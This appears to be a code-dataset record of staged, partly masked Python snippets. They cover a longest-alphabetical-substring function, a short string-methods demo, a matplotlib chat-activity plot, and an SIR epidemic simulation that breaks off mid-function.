"step-2": "def long_alpha(str1):\n list1 = []\n list2 = ''\n maxi = 0\n j = 0\n for i in range(len(str1)):\n if i == 0:\n list2 += str1[i]\n elif ord(str1[i - 1]) <= ord(str1[i]):\n list2 += str1[i]\n else:\n list1.append(list2)\n list2 = ''\n list2 += str1[i]\n list1.append(list2)\n for i in range(len(list1)):\n if maxi < len(list1[i]):\n maxi = len(list1[i])\n j = i\n return list1[j]\n\n\n<mask token>\n",
"step-3": "def long_alpha(str1):\n list1 = []\n list2 = ''\n maxi = 0\n j = 0\n for i in range(len(str1)):\n if i == 0:\n list2 += str1[i]\n elif ord(str1[i - 1]) <= ord(str1[i]):\n list2 += str1[i]\n else:\n list1.append(list2)\n list2 = ''\n list2 += str1[i]\n list1.append(list2)\n for i in range(len(list1)):\n if maxi < len(list1[i]):\n maxi = len(list1[i])\n j = i\n return list1[j]\n\n\n<mask token>\nprint(res)\n",
"step-4": "def long_alpha(str1):\n list1 = []\n list2 = ''\n maxi = 0\n j = 0\n for i in range(len(str1)):\n if i == 0:\n list2 += str1[i]\n elif ord(str1[i - 1]) <= ord(str1[i]):\n list2 += str1[i]\n else:\n list1.append(list2)\n list2 = ''\n list2 += str1[i]\n list1.append(list2)\n for i in range(len(list1)):\n if maxi < len(list1[i]):\n maxi = len(list1[i])\n j = i\n return list1[j]\n\n\nstr1 = 'abcaklmoeeffd'\nres = long_alpha(str1)\nprint(res)\n",
"step-5": "\r\ndef long_alpha(str1):\r\n list1 = []\r\n list2 = \"\"\r\n maxi = 0\r\n j = 0\r\n for i in range(len(str1)):\r\n if i == 0:\r\n list2 += str1[i]\r\n elif ord(str1[i - 1]) <= ord(str1[i]):\r\n list2 += str1[i]\r\n else:\r\n list1.append(list2)\r\n list2 = \"\"\r\n list2 += str1[i]\r\n list1.append(list2)\r\n\r\n for i in range(len(list1)):\r\n if maxi < len(list1[i]):\r\n maxi = len(list1[i])\r\n j = i\r\n return list1[j]\r\nstr1 = \"abcaklmoeeffd\"\r\nres = long_alpha(str1)\r\nprint(res)\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(a)
<|reserved_special_token_0|>
print(b)
<|reserved_special_token_0|>
print(c)
<|reserved_special_token_0|>
print(d)
<|reserved_special_token_1|>
a = len('Karen')
print(a)
b = 'Rainha Elizabeth'.count('a')
print(b)
c = 'karen nayara'.replace('a', '@')
print(c)
d = 'karen meeseeks gomes'.split()
print(d)
<|reserved_special_token_1|>
# len(): length of the string
# count(): counts how many times a character appears
# lower(), upper()
# replace(): replaces letters with another character
# split(): splits a string on whitespace
a = len('Karen')
print(a)
b = 'Rainha Elizabeth'.count('a')
print(b)
c = 'karen nayara'.replace('a','@')
print(c)
d = 'karen meeseeks gomes'.split()
print(d)
|
flexible
|
{
"blob_id": "3079fdbe6319454ad166d06bda5670554a5746ee",
"index": 1004,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(a)\n<mask token>\nprint(b)\n<mask token>\nprint(c)\n<mask token>\nprint(d)\n",
"step-3": "a = len('Karen')\nprint(a)\nb = 'Rainha Elizabeth'.count('a')\nprint(b)\nc = 'karen nayara'.replace('a', '@')\nprint(c)\nd = 'karen meeseeks gomes'.split()\nprint(d)\n",
"step-4": "# len(): tamanho da string\n# count(): conta quantas vezes um caractere aparece\n# lower(), upper()\n# replace(): substitui as letras por outra\n# split(): quebra uma string a partir dos espacos em branco\n\na = len('Karen')\nprint(a)\nb = 'Rainha Elizabeth'.count('a')\nprint(b)\nc = 'karen nayara'.replace('a','@')\nprint(c)\nd = 'karen meeseeks gomes'.split()\nprint(d)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import math
import datetime
import numpy as np
import matplotlib.pyplot as plt
def draw_chat(
id, smooth_id, main_mode,
my_name, chat_day_data,
main_plot, pie_plot, list_chats_plot):
min_in_day = 1440
possible_smooth = [1, 2, 3, 4, 5, 6, 8, 9, 10, 12, 15, 16, 18, 20, 24, 30, 32, 36, 40, 45, 48, 60]
possible_smooth = [10, 12, 15, 16, 18, 20, 24, 30, 32, 36, 40, 45, 48, 60]
possible_smooth = [10, 15, 20, 30, 40, 45, 60] #divisors of 1440 (minutes in day)
count_of_chats = len(chat_day_data)
id = (id + count_of_chats) % count_of_chats
smooth_id = (smooth_id + len(possible_smooth)) % len(possible_smooth)
smooth = possible_smooth[smooth_id]
sum_score = chat_day_data[id][2]
calendar = chat_day_data[id][3]
companion_name = chat_day_data[id][0]
def draw_main_plot_as_all():
first_day = 0
def gen_data():
nonlocal first_day
calendar_dates = list(calendar.keys())
ind = [0]
now = min(calendar_dates)
first_day = now
last = max(calendar_dates)
duration = (last - now).days + 1
need_space_btw_labels = duration // 25
labels = [now]
last_label = 0
t = 0
vals = [0] * duration
vals[0] = calendar[now]
while now != last:
now += datetime.timedelta(days=1)
t += 1
if now in calendar_dates:
ind.append(t)
vals[t] = calendar[now]
if t-last_label >= need_space_btw_labels:
last_label = t
labels.append(str(now))
else:
labels.append("")
def make_smoothie(a, shift):
n = len(a)
res = [0] * n
koef = []
for i in range(shift+1):
koef.append( max(0, math.cos(i/(shift+1))**2*2 - 1) )
for i in range(n):
sum = 0
sum_k = 0
for j in range(-shift, shift+1):
if 0 <= i+j < n:
k = koef[abs(j)]
sum += a[i+j] * k
sum_k += k
res[i] = sum / sum_k
return res
s = int((duration/50)**0.5) #random.randint(0,10)
print(duration, s)
vals = make_smoothie(vals, s)
return ind,labels,vals
width = 1 # default value
plot = main_plot
plot.clear()
ind, labels, vals = gen_data()
plot.set_xticks(ind)
plot.set_xticklabels(labels)
plot.xaxis.set_tick_params(rotation=90)
#plot.bar(ind, vals, width)
plot.bar(range(len(vals)), vals, width)
def format_coord(x, y):
day = int(x + 0.5)
day = first_day + datetime.timedelta(days=day)
#print(day,y)
val = 0
if day in calendar:
val = calendar[day]
if val > 512:
val = str(val // 1024) + "." + str(int((val % 1024 / 102.4 + 0.5)))
val += "Kb"
return str(day) + " " + str(val)
return str(day)
plot.format_coord = format_coord
#plot.set_yscale('log')
def draw_main_plot_as_day():
N = min_in_day // smooth
def set_smooth(score, smooth):
res = [0] * N
for i in range(min_in_day):
res[i//smooth] += score[i]
#res[i] = sum(score[i*smooth:(i+1)*smooth])
return res
me_score = set_smooth(sum_score[0], smooth)
he_score = set_smooth(sum_score[1], smooth)
ind = np.arange(N)
width = 1
def gen_time_labels():
            # Set the step between labels so that their count ends up near 24
k = int(N / 24 + 0.5)
def time(t):
# get time in format `h:mm` from `t` as minute
return str(t//60) + ":" + str(t//10%6)+str(t%10)
labels = [time(x*smooth) if x % k == 0 else ""
for x in range(N)]
return labels
width = 0.8 # default value
plot = main_plot
plot.clear()
plot.set_xticks(ind)
plot.set_xticklabels(gen_time_labels())
plot.xaxis.set_tick_params(rotation=90)
p1 = plot.bar(ind, me_score, width)
p2 = plot.bar(ind, he_score, width, bottom=me_score)
plot.legend((p1[0], p2[0]), (my_name, companion_name))
def format_coord(x,y):
x = int(x+0.5)
if 0 <= x < len(me_score) and me_score[x] + he_score[x]:
rate = me_score[x] / (me_score[x] + he_score[x])
return f"rate: {rate*100:.2f}%"
return None
plot.format_coord = format_coord
def draw_main_plot(mode):
if mode == 0:
draw_main_plot_as_day()
else:
draw_main_plot_as_all()
def draw_pie():
sizes = chat_day_data[id][1]
explode = [0, 0, 0.1]
pie_plot.clear()
def get_angle():
# Set green part (forwarded message) in central bottom part
return -90 + 360*(sizes[2]/(2*sum(sizes)))
pie_plot.pie(sizes, wedgeprops=dict(width=1.0), explode=explode, autopct='%1.1f%%',
shadow=True, startangle=get_angle())
pie_plot.format_coord = lambda x,y: None
def draw_list_chats(id):
chats_above = 4
chats_bottom = 5
if count_of_chats < chats_above + 1 + chats_bottom:
chats_above = id
chats_bottom = count_of_chats - id - 1
if id < chats_above:
chats_bottom += chats_above - id
chats_above = id
if id + chats_bottom >= count_of_chats:
chats_bottom = count_of_chats - id - 1
plot = list_chats_plot
N = chats_above + 1 + chats_bottom
people = []
scores = []
for i in range(-chats_above, chats_bottom+1):
people.append(chat_day_data[i+id][0])
scores.append(sum(chat_day_data[i+id][1]))
selected_chat = [0] * N
selected_chat[chats_above] = scores[chats_above]
plot.clear()
plot.set_yticks(range(N))
plot.set_yticklabels(people)
plot.invert_yaxis()
plot.yaxis.tick_right()
plot.invert_xaxis()
plot.axes.get_xaxis().set_visible(False)
#plot.axes.get_yaxis().set_ticks([])
bars = plot.barh(range(N), scores)
plot.barh(range(N), selected_chat)
plot.format_coord = lambda x,y: None
for bar in bars:
continue
height = bar.get_y() + bar.get_height() / 2
width = bar.get_x() + bar.get_width()
plot.annotate(f' {str(width)[:]}',
xy=(width, height),
ha='left', va='center')
draw_main_plot(main_mode)
draw_pie()
draw_list_chats(id)
plt.draw()
|
normal
|
{
"blob_id": "b297a09ee19bb8069eb65eb085903b3219c6fe5a",
"index": 7971,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef draw_chat(id, smooth_id, main_mode, my_name, chat_day_data, main_plot,\n pie_plot, list_chats_plot):\n min_in_day = 1440\n possible_smooth = [1, 2, 3, 4, 5, 6, 8, 9, 10, 12, 15, 16, 18, 20, 24, \n 30, 32, 36, 40, 45, 48, 60]\n possible_smooth = [10, 12, 15, 16, 18, 20, 24, 30, 32, 36, 40, 45, 48, 60]\n possible_smooth = [10, 15, 20, 30, 40, 45, 60]\n count_of_chats = len(chat_day_data)\n id = (id + count_of_chats) % count_of_chats\n smooth_id = (smooth_id + len(possible_smooth)) % len(possible_smooth)\n smooth = possible_smooth[smooth_id]\n sum_score = chat_day_data[id][2]\n calendar = chat_day_data[id][3]\n companion_name = chat_day_data[id][0]\n\n def draw_main_plot_as_all():\n first_day = 0\n\n def gen_data():\n nonlocal first_day\n calendar_dates = list(calendar.keys())\n ind = [0]\n now = min(calendar_dates)\n first_day = now\n last = max(calendar_dates)\n duration = (last - now).days + 1\n need_space_btw_labels = duration // 25\n labels = [now]\n last_label = 0\n t = 0\n vals = [0] * duration\n vals[0] = calendar[now]\n while now != last:\n now += datetime.timedelta(days=1)\n t += 1\n if now in calendar_dates:\n ind.append(t)\n vals[t] = calendar[now]\n if t - last_label >= need_space_btw_labels:\n last_label = t\n labels.append(str(now))\n else:\n labels.append('')\n\n def make_smoothie(a, shift):\n n = len(a)\n res = [0] * n\n koef = []\n for i in range(shift + 1):\n koef.append(max(0, math.cos(i / (shift + 1)) ** 2 * 2 - 1))\n for i in range(n):\n sum = 0\n sum_k = 0\n for j in range(-shift, shift + 1):\n if 0 <= i + j < n:\n k = koef[abs(j)]\n sum += a[i + j] * k\n sum_k += k\n res[i] = sum / sum_k\n return res\n s = int((duration / 50) ** 0.5)\n print(duration, s)\n vals = make_smoothie(vals, s)\n return ind, labels, vals\n width = 1\n plot = main_plot\n plot.clear()\n ind, labels, vals = gen_data()\n plot.set_xticks(ind)\n plot.set_xticklabels(labels)\n plot.xaxis.set_tick_params(rotation=90)\n plot.bar(range(len(vals)), vals, width)\n\n def format_coord(x, y):\n day = int(x + 0.5)\n day = first_day + datetime.timedelta(days=day)\n val = 0\n if day in calendar:\n val = calendar[day]\n if val > 512:\n val = str(val // 1024) + '.' 
+ str(int(val % 1024 / \n 102.4 + 0.5))\n val += 'Kb'\n return str(day) + ' ' + str(val)\n return str(day)\n plot.format_coord = format_coord\n\n def draw_main_plot_as_day():\n N = min_in_day // smooth\n\n def set_smooth(score, smooth):\n res = [0] * N\n for i in range(min_in_day):\n res[i // smooth] += score[i]\n return res\n me_score = set_smooth(sum_score[0], smooth)\n he_score = set_smooth(sum_score[1], smooth)\n ind = np.arange(N)\n width = 1\n\n def gen_time_labels():\n k = int(N / 24 + 0.5)\n\n def time(t):\n return str(t // 60) + ':' + str(t // 10 % 6) + str(t % 10)\n labels = [(time(x * smooth) if x % k == 0 else '') for x in\n range(N)]\n return labels\n width = 0.8\n plot = main_plot\n plot.clear()\n plot.set_xticks(ind)\n plot.set_xticklabels(gen_time_labels())\n plot.xaxis.set_tick_params(rotation=90)\n p1 = plot.bar(ind, me_score, width)\n p2 = plot.bar(ind, he_score, width, bottom=me_score)\n plot.legend((p1[0], p2[0]), (my_name, companion_name))\n\n def format_coord(x, y):\n x = int(x + 0.5)\n if 0 <= x < len(me_score) and me_score[x] + he_score[x]:\n rate = me_score[x] / (me_score[x] + he_score[x])\n return f'rate: {rate * 100:.2f}%'\n return None\n plot.format_coord = format_coord\n\n def draw_main_plot(mode):\n if mode == 0:\n draw_main_plot_as_day()\n else:\n draw_main_plot_as_all()\n\n def draw_pie():\n sizes = chat_day_data[id][1]\n explode = [0, 0, 0.1]\n pie_plot.clear()\n\n def get_angle():\n return -90 + 360 * (sizes[2] / (2 * sum(sizes)))\n pie_plot.pie(sizes, wedgeprops=dict(width=1.0), explode=explode,\n autopct='%1.1f%%', shadow=True, startangle=get_angle())\n pie_plot.format_coord = lambda x, y: None\n\n def draw_list_chats(id):\n chats_above = 4\n chats_bottom = 5\n if count_of_chats < chats_above + 1 + chats_bottom:\n chats_above = id\n chats_bottom = count_of_chats - id - 1\n if id < chats_above:\n chats_bottom += chats_above - id\n chats_above = id\n if id + chats_bottom >= count_of_chats:\n chats_bottom = count_of_chats - id - 1\n plot = list_chats_plot\n N = chats_above + 1 + chats_bottom\n people = []\n scores = []\n for i in range(-chats_above, chats_bottom + 1):\n people.append(chat_day_data[i + id][0])\n scores.append(sum(chat_day_data[i + id][1]))\n selected_chat = [0] * N\n selected_chat[chats_above] = scores[chats_above]\n plot.clear()\n plot.set_yticks(range(N))\n plot.set_yticklabels(people)\n plot.invert_yaxis()\n plot.yaxis.tick_right()\n plot.invert_xaxis()\n plot.axes.get_xaxis().set_visible(False)\n bars = plot.barh(range(N), scores)\n plot.barh(range(N), selected_chat)\n plot.format_coord = lambda x, y: None\n for bar in bars:\n continue\n height = bar.get_y() + bar.get_height() / 2\n width = bar.get_x() + bar.get_width()\n plot.annotate(f' {str(width)[:]}', xy=(width, height), ha=\n 'left', va='center')\n draw_main_plot(main_mode)\n draw_pie()\n draw_list_chats(id)\n plt.draw()\n",
"step-3": "import math\nimport datetime\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef draw_chat(id, smooth_id, main_mode, my_name, chat_day_data, main_plot,\n pie_plot, list_chats_plot):\n min_in_day = 1440\n possible_smooth = [1, 2, 3, 4, 5, 6, 8, 9, 10, 12, 15, 16, 18, 20, 24, \n 30, 32, 36, 40, 45, 48, 60]\n possible_smooth = [10, 12, 15, 16, 18, 20, 24, 30, 32, 36, 40, 45, 48, 60]\n possible_smooth = [10, 15, 20, 30, 40, 45, 60]\n count_of_chats = len(chat_day_data)\n id = (id + count_of_chats) % count_of_chats\n smooth_id = (smooth_id + len(possible_smooth)) % len(possible_smooth)\n smooth = possible_smooth[smooth_id]\n sum_score = chat_day_data[id][2]\n calendar = chat_day_data[id][3]\n companion_name = chat_day_data[id][0]\n\n def draw_main_plot_as_all():\n first_day = 0\n\n def gen_data():\n nonlocal first_day\n calendar_dates = list(calendar.keys())\n ind = [0]\n now = min(calendar_dates)\n first_day = now\n last = max(calendar_dates)\n duration = (last - now).days + 1\n need_space_btw_labels = duration // 25\n labels = [now]\n last_label = 0\n t = 0\n vals = [0] * duration\n vals[0] = calendar[now]\n while now != last:\n now += datetime.timedelta(days=1)\n t += 1\n if now in calendar_dates:\n ind.append(t)\n vals[t] = calendar[now]\n if t - last_label >= need_space_btw_labels:\n last_label = t\n labels.append(str(now))\n else:\n labels.append('')\n\n def make_smoothie(a, shift):\n n = len(a)\n res = [0] * n\n koef = []\n for i in range(shift + 1):\n koef.append(max(0, math.cos(i / (shift + 1)) ** 2 * 2 - 1))\n for i in range(n):\n sum = 0\n sum_k = 0\n for j in range(-shift, shift + 1):\n if 0 <= i + j < n:\n k = koef[abs(j)]\n sum += a[i + j] * k\n sum_k += k\n res[i] = sum / sum_k\n return res\n s = int((duration / 50) ** 0.5)\n print(duration, s)\n vals = make_smoothie(vals, s)\n return ind, labels, vals\n width = 1\n plot = main_plot\n plot.clear()\n ind, labels, vals = gen_data()\n plot.set_xticks(ind)\n plot.set_xticklabels(labels)\n plot.xaxis.set_tick_params(rotation=90)\n plot.bar(range(len(vals)), vals, width)\n\n def format_coord(x, y):\n day = int(x + 0.5)\n day = first_day + datetime.timedelta(days=day)\n val = 0\n if day in calendar:\n val = calendar[day]\n if val > 512:\n val = str(val // 1024) + '.' 
+ str(int(val % 1024 / \n 102.4 + 0.5))\n val += 'Kb'\n return str(day) + ' ' + str(val)\n return str(day)\n plot.format_coord = format_coord\n\n def draw_main_plot_as_day():\n N = min_in_day // smooth\n\n def set_smooth(score, smooth):\n res = [0] * N\n for i in range(min_in_day):\n res[i // smooth] += score[i]\n return res\n me_score = set_smooth(sum_score[0], smooth)\n he_score = set_smooth(sum_score[1], smooth)\n ind = np.arange(N)\n width = 1\n\n def gen_time_labels():\n k = int(N / 24 + 0.5)\n\n def time(t):\n return str(t // 60) + ':' + str(t // 10 % 6) + str(t % 10)\n labels = [(time(x * smooth) if x % k == 0 else '') for x in\n range(N)]\n return labels\n width = 0.8\n plot = main_plot\n plot.clear()\n plot.set_xticks(ind)\n plot.set_xticklabels(gen_time_labels())\n plot.xaxis.set_tick_params(rotation=90)\n p1 = plot.bar(ind, me_score, width)\n p2 = plot.bar(ind, he_score, width, bottom=me_score)\n plot.legend((p1[0], p2[0]), (my_name, companion_name))\n\n def format_coord(x, y):\n x = int(x + 0.5)\n if 0 <= x < len(me_score) and me_score[x] + he_score[x]:\n rate = me_score[x] / (me_score[x] + he_score[x])\n return f'rate: {rate * 100:.2f}%'\n return None\n plot.format_coord = format_coord\n\n def draw_main_plot(mode):\n if mode == 0:\n draw_main_plot_as_day()\n else:\n draw_main_plot_as_all()\n\n def draw_pie():\n sizes = chat_day_data[id][1]\n explode = [0, 0, 0.1]\n pie_plot.clear()\n\n def get_angle():\n return -90 + 360 * (sizes[2] / (2 * sum(sizes)))\n pie_plot.pie(sizes, wedgeprops=dict(width=1.0), explode=explode,\n autopct='%1.1f%%', shadow=True, startangle=get_angle())\n pie_plot.format_coord = lambda x, y: None\n\n def draw_list_chats(id):\n chats_above = 4\n chats_bottom = 5\n if count_of_chats < chats_above + 1 + chats_bottom:\n chats_above = id\n chats_bottom = count_of_chats - id - 1\n if id < chats_above:\n chats_bottom += chats_above - id\n chats_above = id\n if id + chats_bottom >= count_of_chats:\n chats_bottom = count_of_chats - id - 1\n plot = list_chats_plot\n N = chats_above + 1 + chats_bottom\n people = []\n scores = []\n for i in range(-chats_above, chats_bottom + 1):\n people.append(chat_day_data[i + id][0])\n scores.append(sum(chat_day_data[i + id][1]))\n selected_chat = [0] * N\n selected_chat[chats_above] = scores[chats_above]\n plot.clear()\n plot.set_yticks(range(N))\n plot.set_yticklabels(people)\n plot.invert_yaxis()\n plot.yaxis.tick_right()\n plot.invert_xaxis()\n plot.axes.get_xaxis().set_visible(False)\n bars = plot.barh(range(N), scores)\n plot.barh(range(N), selected_chat)\n plot.format_coord = lambda x, y: None\n for bar in bars:\n continue\n height = bar.get_y() + bar.get_height() / 2\n width = bar.get_x() + bar.get_width()\n plot.annotate(f' {str(width)[:]}', xy=(width, height), ha=\n 'left', va='center')\n draw_main_plot(main_mode)\n draw_pie()\n draw_list_chats(id)\n plt.draw()\n",
"step-4": "import math\nimport datetime\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef draw_chat(\n id, smooth_id, main_mode, \n my_name, chat_day_data, \n main_plot, pie_plot, list_chats_plot):\n\n min_in_day = 1440\n possible_smooth = [1, 2, 3, 4, 5, 6, 8, 9, 10, 12, 15, 16, 18, 20, 24, 30, 32, 36, 40, 45, 48, 60]\n possible_smooth = [10, 12, 15, 16, 18, 20, 24, 30, 32, 36, 40, 45, 48, 60]\n possible_smooth = [10, 15, 20, 30, 40, 45, 60] #divisors of 1440 (minutes in day)\n \n\n count_of_chats = len(chat_day_data)\n id = (id + count_of_chats) % count_of_chats\n smooth_id = (smooth_id + len(possible_smooth)) % len(possible_smooth)\n \n smooth = possible_smooth[smooth_id]\n sum_score = chat_day_data[id][2]\n calendar = chat_day_data[id][3]\n companion_name = chat_day_data[id][0]\n \n def draw_main_plot_as_all():\n first_day = 0\n def gen_data():\n nonlocal first_day\n \n calendar_dates = list(calendar.keys())\n ind = [0]\n now = min(calendar_dates)\n first_day = now\n last = max(calendar_dates)\n duration = (last - now).days + 1\n need_space_btw_labels = duration // 25\n labels = [now]\n last_label = 0\n t = 0\n vals = [0] * duration\n vals[0] = calendar[now]\n \n while now != last:\n now += datetime.timedelta(days=1)\n t += 1\n if now in calendar_dates:\n ind.append(t)\n vals[t] = calendar[now]\n if t-last_label >= need_space_btw_labels:\n last_label = t\n labels.append(str(now))\n else:\n labels.append(\"\")\n \n def make_smoothie(a, shift):\n n = len(a)\n res = [0] * n\n \n koef = []\n for i in range(shift+1):\n koef.append( max(0, math.cos(i/(shift+1))**2*2 - 1) )\n \n for i in range(n):\n sum = 0\n sum_k = 0\n for j in range(-shift, shift+1):\n if 0 <= i+j < n:\n k = koef[abs(j)]\n sum += a[i+j] * k\n sum_k += k\n res[i] = sum / sum_k\n return res\n\n s = int((duration/50)**0.5) #random.randint(0,10)\n print(duration, s)\n vals = make_smoothie(vals, s)\n\n return ind,labels,vals\n\n width = 1 # default value\n plot = main_plot\n \n plot.clear()\n ind, labels, vals = gen_data()\n plot.set_xticks(ind)\n plot.set_xticklabels(labels)\n plot.xaxis.set_tick_params(rotation=90)\n #plot.bar(ind, vals, width)\n plot.bar(range(len(vals)), vals, width)\n \n def format_coord(x, y):\n day = int(x + 0.5)\n day = first_day + datetime.timedelta(days=day)\n #print(day,y)\n val = 0\n if day in calendar:\n val = calendar[day]\n if val > 512:\n val = str(val // 1024) + \".\" + str(int((val % 1024 / 102.4 + 0.5)))\n val += \"Kb\"\n return str(day) + \" \" + str(val)\n return str(day)\n\n plot.format_coord = format_coord\n #plot.set_yscale('log')\n\n\n def draw_main_plot_as_day():\n N = min_in_day // smooth\n \n def set_smooth(score, smooth):\n res = [0] * N\n for i in range(min_in_day):\n res[i//smooth] += score[i]\n #res[i] = sum(score[i*smooth:(i+1)*smooth])\n return res\n\n me_score = set_smooth(sum_score[0], smooth)\n he_score = set_smooth(sum_score[1], smooth)\n\n ind = np.arange(N)\n width = 1 \n def gen_time_labels():\n # Set step between labels for they count of be near the 24\n k = int(N / 24 + 0.5) \n\n def time(t):\n # get time in format `h:mm` from `t` as minute\n return str(t//60) + \":\" + str(t//10%6)+str(t%10)\n labels = [time(x*smooth) if x % k == 0 else \"\" \n for x in range(N)]\n return labels \n\n width = 0.8 # default value\n plot = main_plot\n \n plot.clear()\n plot.set_xticks(ind)\n plot.set_xticklabels(gen_time_labels())\n plot.xaxis.set_tick_params(rotation=90)\n p1 = plot.bar(ind, me_score, width)\n p2 = plot.bar(ind, he_score, width, bottom=me_score)\n 
plot.legend((p1[0], p2[0]), (my_name, companion_name))\n\n def format_coord(x,y):\n x = int(x+0.5)\n if 0 <= x < len(me_score) and me_score[x] + he_score[x]:\n rate = me_score[x] / (me_score[x] + he_score[x])\n return f\"rate: {rate*100:.2f}%\"\n \n return None\n\n plot.format_coord = format_coord\n\n def draw_main_plot(mode):\n if mode == 0:\n draw_main_plot_as_day()\n else:\n draw_main_plot_as_all()\n\n\n def draw_pie():\n sizes = chat_day_data[id][1]\n explode = [0, 0, 0.1] \n pie_plot.clear()\n\n def get_angle():\n # Set green part (forwarded message) in central bottom part\n return -90 + 360*(sizes[2]/(2*sum(sizes)))\n\n pie_plot.pie(sizes, wedgeprops=dict(width=1.0), explode=explode, autopct='%1.1f%%',\n shadow=True, startangle=get_angle())\n pie_plot.format_coord = lambda x,y: None\n \n def draw_list_chats(id):\n chats_above = 4\n chats_bottom = 5\n\n if count_of_chats < chats_above + 1 + chats_bottom:\n chats_above = id\n chats_bottom = count_of_chats - id - 1\n\n if id < chats_above:\n chats_bottom += chats_above - id\n chats_above = id\n if id + chats_bottom >= count_of_chats:\n chats_bottom = count_of_chats - id - 1\n\n plot = list_chats_plot\n N = chats_above + 1 + chats_bottom\n people = []\n scores = []\n for i in range(-chats_above, chats_bottom+1):\n people.append(chat_day_data[i+id][0])\n scores.append(sum(chat_day_data[i+id][1]))\n\n selected_chat = [0] * N\n selected_chat[chats_above] = scores[chats_above]\n\n plot.clear()\n plot.set_yticks(range(N))\n plot.set_yticklabels(people)\n plot.invert_yaxis() \n plot.yaxis.tick_right()\n plot.invert_xaxis()\n plot.axes.get_xaxis().set_visible(False)\n #plot.axes.get_yaxis().set_ticks([])\n\n bars = plot.barh(range(N), scores)\n plot.barh(range(N), selected_chat)\n plot.format_coord = lambda x,y: None\n\n for bar in bars:\n continue\n height = bar.get_y() + bar.get_height() / 2\n width = bar.get_x() + bar.get_width()\n plot.annotate(f' {str(width)[:]}',\n xy=(width, height),\n ha='left', va='center')\n\n\n draw_main_plot(main_mode)\n draw_pie()\n draw_list_chats(id)\n plt.draw()\n\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def run_Simulation2(k, N=100, T=10, start=1, p=0.5, q=0.08, startcenter=
False, startcorner=False):
"""
run the simulation for the pop
"""
recover = [0]
infect = [start]
suspect = [N - start]
pop = [Person() for i in range(N)]
for i in range(start):
pop[i].get_infected()
if startcenter:
resetcenter(start, pop)
if startcorner:
resetcorner(start, pop)
np.random.seed(10)
for i in range(T):
for j in range(N):
pop[j].movepos(p)
X = calculatedistance(pop)
tree = cKDTree(X)
for j in range(N):
if pop[j].is_infected():
addvalue = np.array([X[j]])
inds = tree.query_ball_point(addvalue, q)
inds = inds[0]
for l in inds:
if pop[l].is_willinfected():
pop[l].get_infected()
for j in range(N):
if pop[j].is_infected():
if np.random.rand() < k:
pop[j].get_recovered()
recover.append(count_recover(pop))
infect.append(count_infect(pop))
suspect.append(count_suspectial(pop))
newrecover = [(i / N) for i in recover]
newsuspect = [(s / N) for s in suspect]
newinfect = [(i / N) for i in infect]
plt.plot(range(T + 1), newrecover, label='r: percentage of removed ')
plt.plot(range(T + 1), newsuspect, label='s: percentage of susceptible')
plt.plot(range(T + 1), newinfect, label='i: percentage of infected')
plt.xlabel('T')
plt.ylabel('percentage')
plt.title('Percentage of Population, Discrete')
plt.legend()
plt.show()
<|reserved_special_token_0|>
def checkinfectb(k, N, T, start=1, p=0.5, q=0.08, startcenter=False,
startcorner=False):
"""
we use this function for checking the total infected people
"""
recover = [0]
infect = [start]
suspect = [N - start]
pop = [Person() for i in range(N)]
np.random.seed(10)
for i in range(start):
pop[i].get_infected()
if startcenter:
resetcenter(start, pop)
if startcorner:
resetcorner(start, pop)
np.random.seed(10)
for i in range(T):
for j in range(N):
pop[j].movepos(p)
X = calculatedistance(pop)
tree = cKDTree(X)
for j in range(N):
if pop[j].is_infected():
addvalue = np.array([X[j]])
inds = tree.query_ball_point(addvalue, q)
inds = inds[0]
for l in inds:
if pop[l].is_willinfected():
pop[l].get_infected()
for j in range(N):
if pop[j].is_infected():
if np.random.rand() < k:
pop[j].get_recovered()
return np.array([(count_infect(pop) + count_recover(pop)) / N,
count_infect(pop) / N])
def plotcenterrange():
"""
show how the total infected people i change with p start from center
"""
plist1 = np.arange(0.02, 0.1, 0.02)
plist = np.arange(0.1, 1, 0.1)
infectlist = []
for i in plist1:
infectlist.append(checkinfectb(0.5, 20000, 30, 200, p=i, q=np.sqrt(
2 / (20000 * math.pi)), startcenter=True)[0])
for i in plist:
infectlist.append(checkinfectb(0.5, 20000, 30, 200, p=i, q=np.sqrt(
2 / (20000 * math.pi)), startcenter=True)[0])
plt.plot(np.hstack((plist1, plist)), infectlist)
plt.title('centerplot')
plt.xlabel('p')
plt.ylabel('total number of individuals infected')
plt.title('Total Number of Individuals Infected vs p')
plt.show()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
sys.path.append('../')
<|reserved_special_token_0|>
def run_Simulation2(k, N=100, T=10, start=1, p=0.5, q=0.08, startcenter=
False, startcorner=False):
"""
run the simulation for the pop
"""
recover = [0]
infect = [start]
suspect = [N - start]
pop = [Person() for i in range(N)]
for i in range(start):
pop[i].get_infected()
if startcenter:
resetcenter(start, pop)
if startcorner:
resetcorner(start, pop)
np.random.seed(10)
for i in range(T):
for j in range(N):
pop[j].movepos(p)
X = calculatedistance(pop)
tree = cKDTree(X)
for j in range(N):
if pop[j].is_infected():
addvalue = np.array([X[j]])
inds = tree.query_ball_point(addvalue, q)
inds = inds[0]
for l in inds:
if pop[l].is_willinfected():
pop[l].get_infected()
for j in range(N):
if pop[j].is_infected():
if np.random.rand() < k:
pop[j].get_recovered()
recover.append(count_recover(pop))
infect.append(count_infect(pop))
suspect.append(count_suspectial(pop))
newrecover = [(i / N) for i in recover]
newsuspect = [(s / N) for s in suspect]
newinfect = [(i / N) for i in infect]
plt.plot(range(T + 1), newrecover, label='r: percentage of removed ')
plt.plot(range(T + 1), newsuspect, label='s: percentage of susceptible')
plt.plot(range(T + 1), newinfect, label='i: percentage of infected')
plt.xlabel('T')
plt.ylabel('percentage')
plt.title('Percentage of Population, Discrete')
plt.legend()
plt.show()
run_Simulation2(0.6, N=20000, T=30, start=10)
def checkinfectb(k, N, T, start=1, p=0.5, q=0.08, startcenter=False,
startcorner=False):
"""
we use this function for checking the total infected people
"""
recover = [0]
infect = [start]
suspect = [N - start]
pop = [Person() for i in range(N)]
np.random.seed(10)
